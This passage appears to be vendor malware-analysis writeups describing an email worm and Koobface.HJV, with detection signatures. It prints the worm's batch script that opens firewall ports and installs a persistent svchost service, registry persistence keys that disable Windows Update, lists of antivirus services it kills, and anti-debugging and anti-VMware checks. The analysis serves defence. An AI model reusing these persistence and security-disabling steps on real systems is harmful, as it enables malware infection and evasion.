  • Super Utilities Pro 2009 11.0.exe
  • Total Commander7 license+keygen.exe
  • Trojan Killer v2.9.4173.exe
  • Tuneup Ultilities 2010.exe
  • Twitter FriendAdder 2.1.1.exe
  • Uniblue RegistryBooster 2010.exe
  • VmWare 7.0 keygen.exe
  • VmWare keygen.exe
  • Winamp.Pro.v7.33.PowerPack.Portable+installer.exe
  • Windows 2008 Enterprise Server VMWare Virtual Machine.exe
  • Windows2008 keygen and activator.exe
  • Windows 7 Ultimate keygen.exe
  • Windows XP PRO Corp SP3 valid-key generator.exe
  • WinRAR v3.x keygen RaZoR.exe
  • YouTubeGet 5.4.exe
  • Youtube Music Downloader 1.0.exe

Email Propagation

Harvests email addresses from files with the following extensions:

  • asp
  • dbx
  • doc
  • htm
  • log
  • lst
  • nfo
  • php
  • rtf
  • txt
  • wab
  • wpd
  • wps
  • xls
  • xml

It avoids sending email to addresses containing the following strings:

  • .com
  • .gov
  • .mil
  • abuse
  • acd-group
  • acdnet.com
  • acdsystems.com
  • acketst
  • admin
  • ahnlab
  • alcatel-lucent.com
  • anyone
  • apache
  • arin.
  • avg.comsysinternals
  • avira
  • badware
  • berkeley
  • bitdefender
  • bluewin.ch
  • borlan
  • bpsoft.com
  • bsd
  • bugs
  • buyrar.com
  • ca
  • certific
  • cisco
  • clamav
  • contact
  • debian
  • drweb
  • eset.com
  • example
  • f-secure
  • fido
  • firefox
  • fsf.
  • ghisler.com
  • gimp
  • gnu
  • gold-certs
  • gov.
  • help
  • honeynet
  • honeypot
  • iana
  • ibm.com
  • icrosoft
  • idefense
  • ietf
  • ikarus
  • immunityinc.com
  • info
  • inpris
  • isc.o
  • isi.e
  • jgsoft
  • kaspersky
  • kernel
  • lavasoft
  • linux
  • listserv
  • mcafee
  • me
  • messagelabs
  • mit.e
  • mozilla
  • mydomai
  • no
  • nobody
  • nodomai
  • noone
  • not
  • nothing
  • novirusthanks
  • ntivi
  • nullsoft.org
  • page
  • panda
  • pgp
  • postmaster
  • prevx
  • privacy
  • qualys
  • quebecor.com
  • rating
  • redhat
  • rfc-ed
  • root
  • ruslis
  • sales
  • samba
  • samples
  • secur
  • security
  • sendmail
  • service
  • site
  • slashdot
  • soft
  • somebody
  • someone
  • sopho
  • sourceforge
  • spam
  • spm
  • ssh.com
  • submit
  • sun.com
  • support
  • suse
  • syman
  • tanford.e
  • the.bat
  • unix
  • usenet
  • utgers.ed
  • virus
  • virusbuster
  • webmaster
  • websense
  • winamp
  • winpcap
  • wireshark
  • www.ca.com
  • www
  • you
  • your

Queries the available mail exchange (MX) servers to send the email.


Other System Modification:

Deletes files from the following directory:

  • Program Files\prevx

Deletes files referenced by the following registry entries:

  • HKEY_LOCAL_MACHINE\SOFTWARE\McAfee\AVEngine szInstallDir = “mcshield.exe”
  • HKEY_LOCAL_MACHINE\SOFTWARE\Malwarebytes' Anti-Malware InstallPath = “*.*”

Terminates the following services belonging to antivirus and security software:

  • AVP
  • AntiVirSchedulerService
  • Arrakis3
  • CSIScanner
  • CaCCProvSP
  • ERSvc
  • Ehttpsrv
  • Emproxy
  • FPAVServer
  • GWMSRV
  • K7EmlPxy
  • K7RTScan
  • K7TSMngr
  • LIVESRV
  • LiveUpdate Notice Service
  • MBAMService
  • MCNASVC
  • MPFSERVICE
  • MPS9
  • McAfee HackerWatch Service
  • Norton AntiVirus
  • PANDA SOFTWARE CONTROLLER
  • PAVFNSVR
  • PAVPRSRV
  • PAVSVR
  • PSHOST
  • PSIMSVC
  • PSKSVCRETAIL
  • RSCCenter
  • RSRavMon
  • SAVScan
  • SUM
  • Savadminservice
  • Savservice
  • Sophos Agent
  • Sophos Autoupdate Service
  • Sophos Certification Manager
  • Sophos Management Service
  • Sophos Message Router
  • Symantec Core LC
  • TPSRV
  • ThreatFire
  • VSSERV
  • WerSvc
  • WinDefend
  • XCOMM
  • antivirservice
  • avast! Antivirus
  • avast! Mail Scanner
  • avast! Web Scanner
  • avg8emc
  • avg8wd
  • bdss
  • ccEvtMgr
  • ccproxy
  • ccpwdsvc
  • ccsetmgr
  • ekrn
  • liveupdate
  • mcODS
  • mcmisupdmgr
  • mcmscsvc
  • mcpromgr
  • mcproxy
  • mcredirector
  • mcshield
  • mcsysmon
  • msk80service
  • navapsvc
  • npfmntor
  • nscservice
  • sbamsvc
  • scan
  • sdauxservice
  • sdcodeservice
  • sndsrvc
  • spbbcsvc
  • wscsvc

C&C Server

Sends information to the following remote server:

    153.26.137.241

Anti-debugging Technique

Checks for the following SoftICE debugger drivers:

  • \\.\SICE
  • \\.\NTICE
  • \\.\SIWVIDSTART

Anti-VMware:

Checks whether it is running inside VMware by looking for the following driver:

  • \\.\VMDRV

SonicWALL Gateway AntiVirus provides protection against this worm via the following signatures:

GAV: Buzus.GDEF (Trojan)
GAV: Twain.A (Trojan)
GAV: Mufanom.APSW (Trojan)
GAV: (Cloud) Mufanom.APSW (Trojan)


Koobface.HJV – Spreading in the wild (Feb 04, 2011)

The SonicWALL UTM Research team discovered a new malicious Worm spreading in the wild. The Worm spreads via Facebook profiles and, as part of its post-infection activity, installs fake AVG antivirus security software.

The Worm performs the following DNS queries:

  • www.google.com
  • facebook.com
  • www.facebook.com
  • d.static.ak.fbcdn.net
  • x-treme-radio.host22.com
  • www.ashiww.com
  • www.wahdohotel.nl
  • kingswoodwright.com
  • kbfgb.greyzzsecure9.com
  • 3064972.greyzzsecure9.com

The Worm attempts to load various web pages using random page names with the .css extension:

  • http://206.160.{removed}.9/rsrc.php/yW/r/Xx2bs9YPnF_.css
  • http://206.160.{removed}.9/rsrc.php/ye/r/vOYlUxHAn95.css
  • http://206.160.{removed}.9/rsrc.php/yS/r/w4doJXgUPVR.css
  • http://206.160.{removed}.43/rsrc.php/yX/r/pWROpoRFF42.css
  • http://206.160.{removed}.9/rsrc.php/y4/r/LIj01FurENH.css
  • http://206.160.{removed}.9/rsrc.php/yE/r/4Kozs88a56s.css
  • http://206.160.{removed}.43/rsrc.php/yQ/r/dvBK5Hfjbcc.css
  • http://206.160.{removed}.43/rsrc.php/y-/r/Ki5kfy7_Bje.css
  • http://206.160.{removed}.9/rsrc.php/yL/r/u8Bue217GRs.css
  • http://206.160.{removed}.9/rsrc.php/yW/r/Xx2bs9YPnF_.css

The Worm installs the following files on the system:

  • C:\Documents and Settings\{USER}\Local Settings\Temp\feb.bat
  • C:\Documents and Settings\{USER}\Local Settings\Temp\zpskon_1296703528.exe [Detected as GAV: Koobface.FF (Trojan)]
  • C:\Documents and Settings\{USER}\Local Settings\Temp\zpskon_1296699165.exe [Detected as GAV: Delf.EM (Trojan)]
  • C:\WINDOWS\5456456z
  • C:\WINDOWS\bt7.dat
  • C:\WINDOWS\jjp156.exe [Detected as GAV: Koobface.HJV_2 (Worm)]
  • C:\WINDOWS\system32\feb.dll [Detected as GAV: Koobface.HJV_3 (Worm)]
  • C:\WINDOWS\system32\drivers\feb.sys [Detected as GAV: Koobface.FF (Trojan)]

feb.bat contains:

      netsh firewall add allowedprogram name="feb" program="C:\WINDOWS\system32\svchost.exe" mode=enable
      netsh firewall add portopening tcp 8087 feb enable
      sc create "ffeb" type= interact type= share start= auto binpath= "C:\WINDOWS\system32\svchost.exe -k ffeb"
      reg add "hklm\system\currentcontrolset\services\ffeb\parameters" /v servicedll /t reg_expand_sz /d "C:\WINDOWS\system32\feb.dll" /f
      reg add "hklm\system\currentcontrolset\services\ffeb" /v failureactions /t reg_binary /d 00000000000000000000000003000000140000000100000060ea00000100000060ea00000100000060ea0000 /f
      reg add "hklm\software\microsoft\windows nt\currentversion\svchost" /v ffeb /t reg_multi_sz /d "ffeb" /f
      sc start ffeb

feb.dll contains a list of URLs, all of which were either taken down or led to blank pages at the time of writing. Below is a sample of the URLs contained in feb.dll:

  • impri{removed}.gr/.lhinrs/
  • hk{removed}.org/.ycguh3/
  • roomservi{removed}.com.au/.9mov05w/
  • nubs.wo{removed}.co.uk/.7txq/
  • lenga{removed}.com/.ck5rg8/
  • cayenneo{removed}.com/.fplf/
  • www.dead{removed}.co.uk/.qe9v/
  • ib{removed}.org.il/.5cei7f9/
  • www.kurdist{removed}.com/.x5fyik/
  • heali{removed}.co.za/.12vatd/
  • forwardmar{removed}.org/.6sta03t/
  • numerus-{removed}.fr/.li81/
  • fino{removed}.com/.ea2cuwa/
  • fe{removed}.co.za/.jts51/
  • tarr{removed}.com/.5fu3/
  • toppla{removed}.nl/.vfnc/
  • www.fishingfo{removed}.com/.5wmm9/

The worm installs the following registry keys to ensure startup of jjp156.exe and the feb.sys driver:

  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer NoAutoUpdate dword:00000001
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer NoWindowsUpdate dword:00000001
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost ffeb hex(7):66,66,65,62,00,00,
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dfg49df “c:\windows\jjp156.exe”
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_FEB NextInstance dword:00000001
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_FEB\000 Service “feb”
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\feb ImagePath hex(2):”\??\C:\WINDOWS\system32\drivers\feb.sys”

Upon installation the Worm informs the user that it needs to perform a “Scan” of the system:

It performs a fake system scan which is hosted on a Fake AV landing page:

  • http://3064972.greyzzsecure9.com/defender/?914ea0a274=vmzd&8a83854da2d=jjdjtamdvz&5f701=jvottyajzt


When clicking on “Remove all” or “Cancel” it attempts to initiate the download of:

  • bitav_2053_ext6.exe [Detected as GAV: TDSS.ABCR (Trojan)]

The worm will periodically cause pop-up messages such as in the screenshot below:

When clicking OK to such pop-up messages the Worm will bring up further Fake AV pages which attempt to download more malware to the infected machine such as:

  • pack.exe [Detected as GAV: SecurityTool.W (Trojan)]

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: Koobface.HJV (Worm)
  • GAV: Koobface.HJV_2 (Worm)
  • GAV: Koobface.HJV_3 (Worm)
  • GAV: Koobface.FF (Trojan)
  • GAV: Delf.EM (Trojan)
  • GAV: TDSS.ABCR (Trojan)
  • GAV: SecurityTool.W (Trojan)